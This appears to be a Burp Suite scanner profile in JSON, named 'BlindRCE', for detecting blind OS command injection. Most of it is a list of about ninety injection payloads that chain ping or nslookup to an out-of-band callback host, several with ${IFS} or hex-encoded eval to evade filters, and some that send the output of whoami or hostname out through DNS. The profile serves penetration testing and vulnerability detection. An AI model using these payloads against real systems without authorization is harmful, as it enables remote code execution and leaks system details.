[
  {
    "ProfileName": "BlindRCE",
    "Name": "",
    "Enabled": false,
    "Scanner": 1,
    "Author": "@egarme",
    "Payloads": [
      "true, || ping -c 2 {BC}",
      "true, | ping -c 2 {BC}",
      "true,; ping -c 2 {BC}",
      "true, \u0026\u0026 ping -c 2 {BC}",
      "true, \u0026 ping -c 2 {BC}",
      "true,; (nslookup {BC} \u0026)",
      "true,; (nslookup {BC}) ",
      "true,; { nslookup {BC}; }",
      "true,; nslookup {BC}   ",
      "true,; nslookup {BC} \u0026 #",
      "true,; nslookup {BC} \u0026\u003e /dev/null #",
      "true,; nslookup {BC} # ",
      "true,; nslookup {BC} \u003e /dev/null  ",
      "true,; nslookup {BC} \u003e /dev/null #",
      "true,;(nslookup${IFS}q.{BC})  ",
      "true,;nslookup${IFS}a.{BC}  ",
      "true,;nslookup${IFS}f.{BC}#  ",
      "true,;nslookup${IFS}r.{BC}\u003e/dev/null  ",
      "true,;nslookup${IFS}s.{BC}\u0026\u003e/dev/null#  ",
      "true,\u0027; $(nslookup {BC}) #",
      "true,\u0027; nslookup {BC} \u0026 # ",
      "true,\u0027; nslookup {BC} #   ",
      "true,\u0027; nslookup {BC} \u003e /dev/null #",
      "true,\u0027; nslookup {BC}; echo \u0027",
      "true,\u0027;nslookup${IFS}o.{BC}#  ",
      "true,\u0027;nslookup${IFS}p.{BC};echo\u0027  ",
      "true,\"; (nslookup {BC}) #",
      "true,\"; $(nslookup {BC}) #",
      "true,\"; nslookup {BC} \u0026 # ",
      "true,\"; nslookup {BC} #",
      "true,\"; nslookup {BC}; echo \"",
      "true,\";nslookup${IFS}l.{BC}#  ",
      "true,\";nslookup${IFS}m.{BC};echo\"  ",
      "true,\";nslookup${IFS}n.{BC}\u0026 #  ",
      "true,\u0026 nslookup {BC}   ",
      "true,\u0026 nslookup {BC} #",
      "true,\u0026\u0026 (nslookup {BC})  ",
      "true,\u0026\u0026 $(nslookup {BC}) #",
      "true,\u0026\u0026 nslookup {BC}  ",
      "true,\u0026\u0026 nslookup {BC} #",
      "true,\u0026\u0026 nslookup {BC} \u003e /dev/null ",
      "true,\u0026\u0026$(nslookup${IFS}t.{BC}\u003e/dev/null)  ",
      "true,\u0026\u0026nslookup${IFS}b.{BC}  ",
      "true,\u0026\u0026nslookup${IFS}g.{BC}#  ",
      "true,\u0026nslookup${IFS}e.{BC}  ",
      "true,`nslookup {BC} \u0026`",
      "true,`nslookup {BC} \u0026\u003e /dev/null`",
      "true,`nslookup {BC}`",
      "true,`nslookup${IFS}j.{BC}`  ",
      "true,| `nslookup {BC}` #",
      "true,| nslookup {BC}   ",
      "true,| nslookup {BC} # ",
      "true,|| nslookup {BC}  ",
      "true,|| nslookup {BC} #",
      "true,|| nslookup {BC} 2\u003e /dev/null",
      "true,||nslookup${IFS}d.{BC}  ",
      "true,|nslookup${IFS}c.{BC}  ",
      "true,|nslookup${IFS}h.{BC}#  ",
      "true,$(nslookup {BC} \u0026)",
      "true,$(nslookup {BC}; echo \"\")",
      "true,$(nslookup {BC})",
      "true,$(nslookup${IFS}i.{BC})  ",
      "true,$(nslookup${IFS}k.{BC}\u0026)",
      "true,; a\u003dnslookup; b\u003da.{BC}; $a${IFS}$b",
      "true,; eval \"nslookup${IFS}a.{BC}\"",
      "true,; function f() { nslookup a.{BC}; }; f",
      "true,; cmd\u003d(nslookup a.{BC}); \"${cmd[@]}\"",
      "true,; time nslookup a.{BC}",
      "true,; setsid nslookup a.{BC}",
      "true,; alias n\u003dnslookup; n a.{BC}",
      "true,; eval $\u0027\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70\u0027${IFS}\u0027a.{BC}\u0027",
      "true,`; printf \"nslookup a.{BC}\\n\"",
      "true,; { nslookup a.{BC}; }",
      "true,;;`nslookup${IFS}$(whoami).{BC}`;;",
      "true,;$(nslookup${IFS}$(whoami).{BC}) \u0026\u0026",
      "true,;$(`nslookup${IFS}{BC}`) ||",
      "true,;;$(nslookup${IFS}$(hostname).{BC});;",
      "true,;$(X\u003d$\u0027nslookup${IFS}{BC}\u0027 \u0026\u0026 $X) \u0026",
      "true,;$(eval${IFS}$\u0027\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70${IFS}$(whoami).{BC}\u0027) ;;",
      "true,;;`nslookup${IFS}{BC} \u003e /dev/null`;;",
      "true,;$(nslookup${IFS}$(whoami).{BC} \u0026)",
      "true,;`$(nslookup${IFS}$(hostname).{BC})` \u0026\u0026",
      "true,;$(nslookup${IFS}{BC}; echo) ||",
      "true,;$(nslookup${IFS}$(whoami).{BC} #) ;;",
      "true,;;$(nslookup${IFS}{BC} \u0026\u003e/dev/null);;",
      "true,;`nslookup${IFS}$(whoami).{BC}` \u0026",
      "true,;$(nslookup${IFS}$(whoami).{BC}${IFS}--) \u0026\u0026",
      "true,;$(`nslookup${IFS}$(hostname).{BC}`) ||",
      "true,;;$(nslookup${IFS}{BC}) | $(nslookup${IFS}{BC});;",
      "true,;$(nslookup${IFS}$(whoami).{BC} || nslookup${IFS}{BC}) \u0026",
      "true,;$(`nslookup${IFS}{BC} \u0026\u0026 nslookup${IFS}$(whoami).{BC}`) ;;",
      "true,;;`$(nslookup${IFS}$(whoami).{BC})`;;",
      "true,;$(nslookup${IFS}$(hostname).{BC} \u0026\u003e/dev/null) \u0026\u0026"
    ],
    "Encoder": [
      "URL-encode key characters"
    ],
    "UrlEncode": true,
    "CharsToUrlEncode": "|;\u0026",
    "Grep": [],
    "Tags": [
      "Collaborator",
      "RCE",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "BlindRCE",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "RCE with el payloads: \u003cbr\u003e  \u003cpayload\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]